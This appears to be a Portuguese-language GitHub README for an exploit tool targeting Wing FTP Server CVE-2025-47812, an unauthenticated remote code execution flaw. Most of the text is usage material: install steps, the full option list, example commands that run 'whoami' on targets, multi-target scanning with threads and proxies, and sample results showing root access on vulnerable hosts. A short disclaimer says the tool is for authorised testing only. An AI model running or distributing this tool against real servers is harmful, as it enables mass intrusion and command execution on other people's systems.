
Exploit para Wing FTP Server CVE-2025-47812 permitindo execução remota de código não autenticada com varredura de múltiplos alvos, suporte a proxy e múltiplos formatos de saída.
Exploit melhorado para Wing FTP Server CVE-2025-47812 - Execução Remota de Código (RCE) sem autenticação
Clone este repositório e entre no diretório:
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
Ou simplesmente baixe o script CVE-2025-47812.py e execute-o.
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit para Wing FTP Server CVE-2025-47812 - versão melhorada
opções:
-h, --help mostra esta mensagem
-u URL, --url URL URL alvo (ex. http://192.168.1.100:5466)
-f FILE, --file FILE arquivo com lista de URLs (uma por linha)
-c COMMAND, --command COMMAND
comando a executar (padrão: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nome de usuário (padrão: anonymous)
-P PASSWORD, --password PASSWORD
senha (padrão: vazia)
--check modo verificação: apenas verifica se é vulnerável (usa comando inócuo)
-v, --verbose modo verbose (mostra detalhes)
--proxy PROXY proxy (ex. http://127.0.0.1:8080)
--timeout TIMEOUT timeout em segundos (padrão: 10)
-o OUTPUT, --output OUTPUT
arquivo de saída para salvar resultados
--output-format {txt,json,csv}
formato de saída (padrão: txt)
--threads THREADS número de threads para escanear múltiplos alvos (padrão: 5)
--no-progress ocultar barra de progresso
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
O arquivo deve conter uma URL por linha, por exemplo:
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.meuservidor.com:5466
http://192.168.1.10:5466 - VULNERÁVEL - usuário: root
http://192.168.1.11:5466 - SEGURO - Não vulnerável
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuário: root"
}
]
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuário: root
Este exploit é projetado exclusivamente para fins educacionais e testes de segurança autorizados. O uso não autorizado desta ferramenta contra sistemas sem consentimento explícito é ilegal e pode acarretar graves consequências legais. Os autores não se responsabilizam pelo uso indevido que possa ser feito.
Se você gostou deste trabalho, não esqueça de dar uma estrela ⭐ no GitHub!
Este projeto está licenciado sob a MIT License – veja o arquivo LICENSE para mais detalhes.